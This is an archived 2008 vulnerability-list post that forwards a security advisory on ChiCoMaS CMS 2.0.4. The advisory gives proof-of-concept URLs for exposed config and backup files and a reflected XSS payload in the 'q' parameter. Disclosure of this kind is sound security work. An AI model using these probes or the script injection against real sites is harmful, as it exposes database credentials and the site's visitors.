[VIM] [admin at bugreport.ir: chicomas <=2.0.4 Multiple Vulnerabilities]
dm at securityfocus.com
dm at securityfocus.com
Sat Dec 20 17:23:18 UTC 2008
Just a heads up. The XSS is old and known. We have it as BID 29025.
----- Forwarded message from admin at bugreport.ir -----
From: admin at bugreport.ir
Subject: chicomas <=2.0.4 Multiple Vulnerabilities
To: bugtraq at securityfocus.com
Date: Sat, 20 Dec 2008 10:55:49 +0330
User-Agent: Internet Messaging Program (IMP) H3 (4.1.2)
Message-ID: <20081220105549.b6ocl4209cc4wg8c at mail.amnpardaz.com>
########################## www.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: chicomas <=2.0.4 Multiple Vulnerabilities
# Vendor: http://www.chicomas.com/
# Demo: http://demo.opensourcecms.com/chicomas
# Bug: Database Information Disclosure, Authorization Weakness, XSS
# Vulnerable Version: 2.0.4
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_59.htm
###################################################################
####################
- Description:
####################
ChiCoMaS is free web based Content Management System based on PHP &
MySQL with Full featured WYSIWYG TinyMCE editor,
File management with QuiXplorer, User and group administration to
manage access permissions & Backup/Restore with integrated
MySqlBackupPro.
####################
- Vulnerability:
####################
+-->Dtabase Information Disclosure
POC: http://[URL]/chicomas/config.inc
+-->The Latest generated Database backups
POC: http://[URL]/chicomas/backup
+-->Cross Site Scripting (XSS). Reflected XSS attack in "index.php" in
"q" parameter.
POC:
http://[URL]/chicomas/index.php?q="<script>alert(/www.BugReport.ir/.source)</script>
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources. Edit
the source code to ensure that inputs are properly sanitized.
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
----- End forwarded message -----
--
Dave McKinney
Symantec
keyID: E461AE4E
key fingerprint = F1FC 9073 09FA F0C7 500D D7EB E985 FAF3 E461 AE4E
More information about the VIM
mailing list